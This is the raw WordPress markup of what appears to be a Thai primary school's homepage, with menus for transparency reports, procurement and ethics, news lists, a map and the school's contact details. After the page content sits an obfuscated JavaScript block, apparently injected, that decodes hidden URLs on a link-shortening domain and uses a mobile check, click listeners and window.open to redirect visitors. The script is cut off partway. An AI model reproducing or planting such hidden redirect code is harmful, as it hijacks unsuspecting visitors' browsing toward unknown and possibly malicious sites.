900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 